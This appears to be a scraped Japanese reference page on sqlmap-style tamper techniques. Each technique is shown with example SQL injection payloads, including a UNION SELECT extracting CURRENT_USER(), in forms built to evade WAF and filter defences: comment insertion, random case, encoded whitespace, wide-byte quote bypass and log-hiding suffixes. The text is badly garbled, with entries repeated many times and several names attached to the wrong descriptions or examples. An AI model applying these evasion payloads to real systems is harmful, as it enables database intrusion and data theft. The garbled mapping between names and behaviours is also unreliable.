キーワードにコメントを付ける.* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
この文書はhttp://www.chuhades.com/post/19590b_4cc51f
Example:
* Input: '1 AND 9227=9227'
* Output: '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'
SQLキーワードごとにコメントを追加します.
Example:
* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
space2morehash
スペースは、井戸番号、改行、およびより多くのランダム文字列に置き換えられます.Example:
* Input: '1 AND 9227=9227'
* Output: '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'
ifnull2ifisnull
IFNULLフィルタリングを迂回します.Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%A0id%0BFROM%0Cusers'
space2plus
スペースをプラス記号で置換します(ブロックされる可能性があります).Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT+id+FROM+users'
nonrecursivereplacement
二重クエリ文.Example:
* Input: '1 UNION SELECT 2--'
* Output: '1 UNIOUNIONN SELESELECTCT 2--'
space2randomblank
有効な空白記号の文字セットからスペースを選択して置換します.Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%0Did%0DFROM%0Ausers'
sp_password
追加sp_password’は、DBMSログの自動ぼかし処理のペイロードの末尾から.Example:
* Intput: '1 AND 9227=9227-- '
* Output: '1 AND 9227=9227-- sp_password'
Requierment:
* Not Oracle
randomcase
ランダム・大文字と小文字.Example:
* Input: 'INSERT'
* Output: 'INseRt'
unmagicquotes
広い文字はGPC addslashesを迂回します.Example:
* Input: "1' AND 1=1"
* Output: '1%bf%27-- '
randomcomments /*...*/でSQLキーワードを分割します.* Input: 'INSERT'
* Output: 'I/**/N/**/SERT'
halfversionedmorekeywords
キーワードにコメントを付ける.* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
この文書はhttp://www.chuhades.com/post/19590b_4cc51f
Example:
* Input: '1 AND 9227=9227'
* Output: '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'
IFNULLフィルタリングを迂回します.
Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%A0id%0BFROM%0Cusers'
space2plus
スペースをプラス記号で置換します(ブロックされる可能性があります).Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT+id+FROM+users'
nonrecursivereplacement
二重クエリ文.Example:
* Input: '1 UNION SELECT 2--'
* Output: '1 UNIOUNIONN SELESELECTCT 2--'
space2randomblank
有効な空白記号の文字セットからスペースを選択して置換します.Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%0Did%0DFROM%0Ausers'
sp_password
追加sp_password’は、DBMSログの自動ぼかし処理のペイロードの末尾から.Example:
* Intput: '1 AND 9227=9227-- '
* Output: '1 AND 9227=9227-- sp_password'
Requierment:
* Not Oracle
randomcase
ランダム・大文字と小文字.Example:
* Input: 'INSERT'
* Output: 'INseRt'
unmagicquotes
広い文字はGPC addslashesを迂回します.Example:
* Input: "1' AND 1=1"
* Output: '1%bf%27-- '
randomcomments /*...*/でSQLキーワードを分割します.* Input: 'INSERT'
* Output: 'I/**/N/**/SERT'
halfversionedmorekeywords
キーワードにコメントを付ける.* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
この文書はhttp://www.chuhades.com/post/19590b_4cc51f
Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT+id+FROM+users'
二重クエリ文.
Example:
* Input: '1 UNION SELECT 2--'
* Output: '1 UNIOUNIONN SELESELECTCT 2--'
space2randomblank
有効な空白記号の文字セットからスペースを選択して置換します.Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%0Did%0DFROM%0Ausers'
sp_password
追加sp_password’は、DBMSログの自動ぼかし処理のペイロードの末尾から.Example:
* Intput: '1 AND 9227=9227-- '
* Output: '1 AND 9227=9227-- sp_password'
Requierment:
* Not Oracle
randomcase
ランダム・大文字と小文字.Example:
* Input: 'INSERT'
* Output: 'INseRt'
unmagicquotes
広い文字はGPC addslashesを迂回します.Example:
* Input: "1' AND 1=1"
* Output: '1%bf%27-- '
randomcomments /*...*/でSQLキーワードを分割します.* Input: 'INSERT'
* Output: 'I/**/N/**/SERT'
halfversionedmorekeywords
キーワードにコメントを付ける.* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
この文書はhttp://www.chuhades.com/post/19590b_4cc51f
Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%0Did%0DFROM%0Ausers'
追加sp_password’は、DBMSログの自動ぼかし処理のペイロードの末尾から.
Example:
* Intput: '1 AND 9227=9227-- '
* Output: '1 AND 9227=9227-- sp_password'
Requierment:
* Not Oracle
randomcase
ランダム・大文字と小文字.Example:
* Input: 'INSERT'
* Output: 'INseRt'
unmagicquotes
広い文字はGPC addslashesを迂回します.Example:
* Input: "1' AND 1=1"
* Output: '1%bf%27-- '
randomcomments /*...*/でSQLキーワードを分割します.* Input: 'INSERT'
* Output: 'I/**/N/**/SERT'
halfversionedmorekeywords
キーワードにコメントを付ける.* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
この文書はhttp://www.chuhades.com/post/19590b_4cc51f
Example:
* Input: 'INSERT'
* Output: 'INseRt'
広い文字はGPC addslashesを迂回します.
Example:
* Input: "1' AND 1=1"
* Output: '1%bf%27-- '
randomcomments /*...*/でSQLキーワードを分割します.* Input: 'INSERT'
* Output: 'I/**/N/**/SERT'
halfversionedmorekeywords
キーワードにコメントを付ける.* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
この文書はhttp://www.chuhades.com/post/19590b_4cc51f
* Input: 'INSERT'
* Output: 'I/**/N/**/SERT'
キーワードにコメントを付ける.
* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
この文書はhttp://www.chuhades.com/post/19590b_4cc51f